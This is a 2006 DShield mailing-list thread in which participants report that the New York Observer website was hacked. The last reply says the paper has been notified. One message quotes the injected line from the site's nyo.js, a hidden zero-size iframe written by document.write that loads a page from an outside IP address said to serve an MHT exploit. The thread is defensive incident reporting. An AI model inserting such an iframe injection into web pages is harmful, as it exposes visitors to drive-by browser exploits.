[Dshield] New York Newspaper hacked

Tony Nichols tony at mail.applog.com
Mon Feb 27 19:10:10 GMT 2006


On Mon, 2006-02-27 at 07:36 -0500, Tom wrote:
> At 8:57 PM -0600 2/26/06, ptds at majordomo.thedacare.org wrote:
> >On Sun, 26 Feb 2006, Tom wrote:
> >
> >>  At 8:37 AM -0600 2/26/06, ptds at majordomo.thedacare.org wrote:
> >>  >Anyone know a human at the observer in New York?
> >>  >
> >>  >Someone has put an iframe exploit into the code inserted on each page.
> >>  >
> >>  >Don't go here:
> >>  >
> >>  >http://
> >  > >www.observer.com/ 20060227 / 20060227_Joe_Conason_opinions_conason.asp
> >>
> >>  All I see are iframes being used for ads as seen below.
> >>  advertserve.com seems like a totally legit biz and I pulled some ads
> >>  ant them are legit also. What made you think this is an exploit?
> >
> >The iframe is inserted on every page, lives here,
> >www.observer.com// includes/ nyo.js
> >
> >  and reads
> >document.write('<iframe height=0 width=0
> >src="http:// 210.118.120.49/ HitCount/ Top.Htm"></iframe>'
> >
> >It seems its was inserted last Sunday.
> >
> >This, when retrieved, is an mht exploit.
> >
> >The less daring can see a jpg of its effect here
> >http://rrcs-24-106-25-102.west.biz.rr.com/exploit.jpg
> >
> >210.118.120.49 these guys don't answer their abuse email:
> >[ ISP IPv4 Admin Contact Information ]
> >Name               : IPAdministrator
> >Phone              : +82-2-509-0534
> >E-Mail             : snnoc at samsung.com
> >
> >[ ISP IPv4 Tech Contact Information ]
> >Name               : IP Manager
> >Phone              : +82-2-509-0534
> >E-Mail             : snnoc at samsung.com
> >
> >[ ISP Network Abuse Contact Information ]
> >Name               : NetworkAbuse
> >Phone              : +82-2-509-0534
> >E-Mail             : ipabuse at samsung.com
> 
> I stand corrected as I didn't look into the js as I only curl'd a few 
> files. Thanks Paul.
> 
> btw, 210.118.120.49 contact is help at etimes.net
> 
> Tom

I called and notified one of the website managers at the paper... and
forwarded the comments from the both of you.

Great catch... most would not have noticed.

t o n y 
-- 
Tony Nichols <tony at mail.applog.com>
Appalachian Log Structures Inc.



More information about the list mailing list